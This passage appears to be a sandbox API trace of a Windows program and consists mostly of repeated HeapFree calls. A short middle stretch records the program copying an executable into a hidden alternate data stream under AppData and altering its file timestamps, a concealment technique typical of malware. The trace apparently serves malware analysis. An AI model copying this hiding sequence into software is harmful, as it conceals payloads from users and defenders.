out: hHeap=0x6f0000) returned 1 [0103.669] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.669] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.669] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.672] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.673] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.673] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.673] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.673] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.673] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.674] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.674] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.674] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.679] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.679] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.680] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0105.462] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x21 [0105.463] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24a) returned 0x7cc668 [0105.463] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\", lpDst=0x7cc668, nSize=0x21 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 0x21 [0105.463] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x71b0a0 [0105.463] lstrcpyW (in: lpString1=0x7cc6a8, lpString2="Still" | out: lpString1="Still") returned="Still" [0105.463] CopyFileW (lpExistingFileName="\\\\?\\C:\\WINDOWS\\system32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still"), bFailIfExists=1) returned 1 [0106.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", dwFileAttributes=0x2) returned 1 [0106.431] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b0a0 | out: hHeap=0x6f0000) returned 1 [0106.431] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", lpString2=":bin" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin" [0106.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\launchy.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0106.432] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x114190 [0106.432] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x114192) returned 0x24d7020 [0106.435] ReadFile (in: hFile=0x260, lpBuffer=0x24d7020, nNumberOfBytesToRead=0x114190, lpNumberOfBytesRead=0x19feb0, lpOverlapped=0x0 | out: lpBuffer=0x24d7020*, lpNumberOfBytesRead=0x19feb0*=0x114190, lpOverlapped=0x0) returned 1 [0106.468] CloseHandle (hObject=0x260) returned 1 [0106.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still:bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0106.470] WriteFile (in: hFile=0x260, lpBuffer=0x24d7020*, nNumberOfBytesToWrite=0x114190, lpNumberOfBytesWritten=0x19febc, lpOverlapped=0x0 | out: lpBuffer=0x24d7020*, lpNumberOfBytesWritten=0x19febc*=0x114190, lpOverlapped=0x0) returned 1 [0106.544] SetEndOfFile (hFile=0x260) returned 1 [0106.545] CloseHandle (hObject=0x260) returned 1 [0106.624] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x24d7020 | out: hHeap=0x6f0000) returned 1 [0106.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still:bin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0106.632] SetFileTime (hFile=0x260, lpCreationTime=0x7d1458, lpLastAccessTime=0x7d1458, lpLastWriteTime=0x7d1458) returned 1 [0106.632] CloseHandle (hObject=0x260) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70df40 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72c918 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72c9d0 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d5b8 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ea90 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72eb38 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ebd8 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ec78 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ed18 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d928 | out: hHeap=0x6f0000) returned 1 [0106.633] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72db38 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72edb8 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ee70 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ef28 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72efd0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f088 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d458 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f130 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f1d0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f278 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f320 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f3c0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f460 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f508 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f5a8 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7308b0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f650 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f6f8 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f7a0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f840 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f8e0 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f980 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fa20 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fac8 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72cb68 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fb68 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72cc18 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ccc8 | out: hHeap=0x6f0000) returned 1 [0106.634] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fc10 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fcb0 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fd58 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fe00 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ced8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ff68 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730030 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731760 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731980 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72cd78 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7320f8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731f00 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d878 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7300d8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d9d8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d668 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730190 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730248 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730308 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72cab8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730ea0 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70f668 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7322f0 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ddf8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732830 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7303c8 | out: hHeap=0x6f0000) returned 1 [0106.635] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731fa8 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730460 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730f40 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731300 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732050 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7313a0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731580 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730a40 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7321a0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732398 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732590 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7324e8 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7304f8 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731b10 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d198 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7305b0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732248 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732440 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d0e8 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731260 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732638 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731a68 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d508 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72dea8 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731120 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731800 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7311c0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7326e0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7318a0 | out: hHeap=0x6f0000) returned 1 [0106.636] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731db0 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732788 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7328d8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730fe0 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730e00 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732980 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731bb8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730670 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730738 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7307f8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732a48 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732b08 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731080 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731c60 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731d08 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d718 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72cf88 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72df58 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d7c8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732bc0 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731e58 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7316c0 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732c58 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730d60 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7390b8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ab50 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738cc8 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72da88 | out: hHeap=0x6f0000) returned 1 [0106.637] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739f28 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7392b0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739160 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731620 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72dbe8 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730b80 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730c20 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730cc0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ac08 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739b38 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72e008 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739358 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x731440 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73acc0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ad78 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7314e0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7309a0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x730ae0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b860 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73afa0 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739208 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ce38 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73cef8 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ce28 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732d10 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738c20 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739748 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72dd48 | out: hHeap=0x6f0000) returned 1 [0106.638] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bc20 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72dc98 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b5e0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739940 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7396a0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732dd0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b400 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732e68 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b900 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b0e0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bfe0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c080 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733d88 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b680 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739010 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d038 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d248 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73af00 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d2f8 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739a90 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c1c0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738e18 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b2c0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739400 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739fd0 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b180 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738d70 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b220 | out: hHeap=0x6f0000) returned 